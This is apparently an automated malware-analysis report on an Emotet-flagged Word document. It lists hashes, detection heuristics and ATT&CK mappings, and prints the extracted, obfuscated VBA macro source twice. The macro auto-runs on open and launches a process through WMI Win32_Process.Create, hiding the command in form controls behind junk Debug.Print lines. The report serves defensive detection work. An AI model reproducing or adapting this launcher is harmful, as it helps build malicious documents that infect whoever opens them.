Emotet Office (OLE) malware analysis — malicious · 08d5dd5ce04d9e58

MALICIOUS

Office (OLE)

126.5 KB Created: 2019-05-29 21:25:00 Authoring application: Microsoft Office Word First seen: 2019-11-20

MD5: f66b1022d0bffc5aafcb60c97b2a79e1 SHA-1: ea90c90c29d7b0063c620e52b4496b92ef88231a SHA-256: 08d5dd5ce04d9e58dd2a9b76b2cd517eb69effbf8eeedfebb6de232e8e35c325

282 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter T1105 Ingress Tool Transfer T1047 WMI

The sample contains a VBA macro with an AutoOpen subroutine, a common Emotet infection vector. The macro utilizes `CreateObject("winmgmts:...").Get(...).ExecMethod("Create")` to launch a process, indicating it's designed to download and execute a secondary payload. ClamAV also identifies it as Emotet.

Heuristics 8

ClamAV: Doc.Downloader.Emotet-10001946-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE

VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6501 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6501 bytes
SHA-256: `5a3facb95e8891c7ddea38ec674434d29c13ecdc74cba6bd6935cb171d64a74d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "ZcNnEdo, 0, 0, MSForms, ComboBox" Attribute VB_Control = "kww7SAA, 1, 1, MSForms, ComboBox" Attribute VB_Control = "jmVumU, 2, 2, MSForms, ComboBox" Sub _ autoopen( _ ) 'Debug.Print "w3YcARq" + ("735" + ("ui9FnjIw") + "Frbfkd" + "230") + "jw9fzFBt" + ("vwE8iE") + ("aYYiEE" + "Oa43hCO" + "888" + ("wCL_m2jt") + ("Bv5b5Lt" + ("Hr4Zbzm") + "840" + ("705") + ("iLamIpGj" + ("781")))) Debug.Print "SOvUhhb0" + ("343" + ("WYPDnu") + "A3L0v1" + "333") + "MFMS6J" + ("iHREZuM") + ("nBWEBWV" + "GKQ_iMP" + "139" + ("G3jO6Z") + ("u7mI0aU" + ("wNNu3f") + "394" + ("31") + ("ioF1Q_8" + ("430")))) j2vz2Xz 'Debug.Print "kqvunvj" + ("869" + ("ujYzXXjz") + "IzbUvmj" + "3") + "qks5w3Z" + ("u6KztGqw") + ("F6Wifb6P" + "AMjNkBT3" + "500" + ("wPBztA_") + ("Ez2Bir" + ("Lc5m0R") + "781" + ("693") + ("LszzTsdJ" + ("664")))) Debug.Print "nb7iN6M" + ("343" + ("ujNoCH5_") + "GXDwAb" + "265") + "dZBHcc" + ("DvXkWzRU") + ("IQkkJrF" + "TJiworM" + "968" + ("XwMBJzOl") + ("dzb33GPk" + ("RB7Doz") + "534" + ("990") + ("I2_dqw9O" + ("426")))) End Sub Attribute VB_Name = "zRkkXZ1H" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "str6Z3Ms" Attribute VB_Name = "YBOpFbj9" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "CII3CH" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "lVr36URi" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "DjjSCQ9r" Function j2vz2Xz() 'Debug.Print "zorNS4" + ("758" + ("wuLMYOn") + "PE9EYEM" + "666") + "lAS5ZwjD" + ("rWlUJFz") + ("LWUp9GLE" + "jBnW1f" + "561" + ("oYzLl7u8") + ("wSRY1Sk" + ("RzOurwZ") + "418" + ("217") + ("qkZ8CbZK" + ("715")))) Debug.Print "Isb89V" + ("629" + ("MGOVDi") + "TMfj8t" + "812") + "RWZ5ZqlH" + ("Pv2Dza8") + ("SE5iwRzj" + "L_nlDBRY" + "161" + ("jObCWXh") + ("EAMG0zb4" + ("jKWZZhq") + "157" + ("786") + ("CzrRu2c" + ("448")))) LDG3FL = ThisDocument.kww7SAA + ThisDocument.jmVumU + ThisDocument.ZcNnEdo 'Debug.Print "ARsXQl0" + ("516" + ("XcA2whqM") + "n0Cwz8" + "581") + "C1jfPLc" + ("P3Jwbm") + ("BiKM_U" + "pBP5lT" + "9" + ("nB48vq") + ("a5w80h" + ("n7BTUD") + "500" + ("996") + ("HMik_2p" + ("773")))) Debug.Print "jEQ42Hi" + ("435" + ("qfzqzY") + "jsh4rT" + "521") + "w68RN21" + ("iJdMkEO8") + ("T4vl4iF" + "pX9Wum" + "543" + ("Blo_HHu1") + ("Gdpuq3u" + ("QEwH4z") + "758" + ("326") + ("mlBiZ7CA" + ("392")))) CreateObject(("winmg" _ + "mts:Win" + _ "32_Process")).Create# LDG3FL, Czl1lInR, rksq5icm, wWNvOivN 'Debug.Print "FmvNRalm" + ("133" + ("IdtmCMz") + "n5wpGh3" + "567") + "fiKquNP" + ("QFQqkCi") + ("HqBJZj" + "sGHujB" + "679" + ("CAw_Ywl") + ("WfNMmm6z" + ("XcIosh") + "373" + ("144") + ("nDkBG_i1" + ("93")))) Debug.Print "WwaFd_pi" + ("508" + ("faMB6WFc") + "FrOW7MG" + "620") + "kpYBrt" + ("ctp03_") + ("qEEHun" + "QFLthz" + "558" + ("nE8BLUM") + ("vT_IzP5w" + ("cAVE7K") + "696" + ("611") + ("kwKwlH6j" + ... (truncated)

SHA-256: 5a3facb95e8891c7ddea38ec674434d29c13ecdc74cba6bd6935cb171d64a74d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "ZcNnEdo, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "kww7SAA, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "jmVumU, 2, 2, MSForms, ComboBox"
Sub _
autoopen( _
)
   'Debug.Print "w3YcARq" + ("735" + ("ui9FnjIw") + "Frbfkd" + "230") + "jw9fzFBt" + ("vwE8iE") + ("aYYiEE" + "Oa43hCO" + "888" + ("wCL_m2jt") + ("Bv5b5Lt" + ("Hr4Zbzm") + "840" + ("705") + ("iLamIpGj" + ("781"))))
Debug.Print "SOvUhhb0" + ("343" + ("WYPDnu") + "A3L0v1" + "333") + "MFMS6J" + ("iHREZuM") + ("nBWEBWV" + "GKQ_iMP" + "139" + ("G3jO6Z") + ("u7mI0aU" + ("wNNu3f") + "394" + ("31") + ("ioF1Q_8" + ("430"))))
j2vz2Xz
   'Debug.Print "kqvunvj" + ("869" + ("ujYzXXjz") + "IzbUvmj" + "3") + "qks5w3Z" + ("u6KztGqw") + ("F6Wifb6P" + "AMjNkBT3" + "500" + ("wPBztA_") + ("Ez2Bir" + ("Lc5m0R") + "781" + ("693") + ("LszzTsdJ" + ("664"))))
Debug.Print "nb7iN6M" + ("343" + ("ujNoCH5_") + "GXDwAb" + "265") + "dZBHcc" + ("DvXkWzRU") + ("IQkkJrF" + "TJiworM" + "968" + ("XwMBJzOl") + ("dzb33GPk" + ("RB7Doz") + "534" + ("990") + ("I2_dqw9O" + ("426"))))
End Sub


Attribute VB_Name = "zRkkXZ1H"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "str6Z3Ms"

Attribute VB_Name = "YBOpFbj9"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "CII3CH"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "lVr36URi"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "DjjSCQ9r"
Function j2vz2Xz()
   'Debug.Print "zorNS4" + ("758" + ("wuLMYOn") + "PE9EYEM" + "666") + "lAS5ZwjD" + ("rWlUJFz") + ("LWUp9GLE" + "jBnW1f" + "561" + ("oYzLl7u8") + ("wSRY1Sk" + ("RzOurwZ") + "418" + ("217") + ("qkZ8CbZK" + ("715"))))
Debug.Print "Isb89V" + ("629" + ("MGOVDi") + "TMfj8t" + "812") + "RWZ5ZqlH" + ("Pv2Dza8") + ("SE5iwRzj" + "L_nlDBRY" + "161" + ("jObCWXh") + ("EAMG0zb4" + ("jKWZZhq") + "157" + ("786") + ("CzrRu2c" + ("448"))))
LDG3FL = ThisDocument.kww7SAA + ThisDocument.jmVumU + ThisDocument.ZcNnEdo
   'Debug.Print "ARsXQl0" + ("516" + ("XcA2whqM") + "n0Cwz8" + "581") + "C1jfPLc" + ("P3Jwbm") + ("BiKM_U" + "pBP5lT" + "9" + ("nB48vq") + ("a5w80h" + ("n7BTUD") + "500" + ("996") + ("HMik_2p" + ("773"))))
Debug.Print "jEQ42Hi" + ("435" + ("qfzqzY") + "jsh4rT" + "521") + "w68RN21" + ("iJdMkEO8") + ("T4vl4iF" + "pX9Wum" + "543" + ("Blo_HHu1") + ("Gdpuq3u" + ("QEwH4z") + "758" + ("326") + ("mlBiZ7CA" + ("392"))))
CreateObject(("winmg" _
+ "mts:Win" + _
"32_Process")).Create# LDG3FL, Czl1lInR, rksq5icm, wWNvOivN
   'Debug.Print "FmvNRalm" + ("133" + ("IdtmCMz") + "n5wpGh3" + "567") + "fiKquNP" + ("QFQqkCi") + ("HqBJZj" + "sGHujB" + "679" + ("CAw_Ywl") + ("WfNMmm6z" + ("XcIosh") + "373" + ("144") + ("nDkBG_i1" + ("93"))))
Debug.Print "WwaFd_pi" + ("508" + ("faMB6WFc") + "FrOW7MG" + "620") + "kpYBrt" + ("ctp03_") + ("qEEHun" + "QFLthz" + "558" + ("nE8BLUM") + ("vT_IzP5w" + ("cAVE7K") + "696" + ("611") + ("kwKwlH6j" + 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.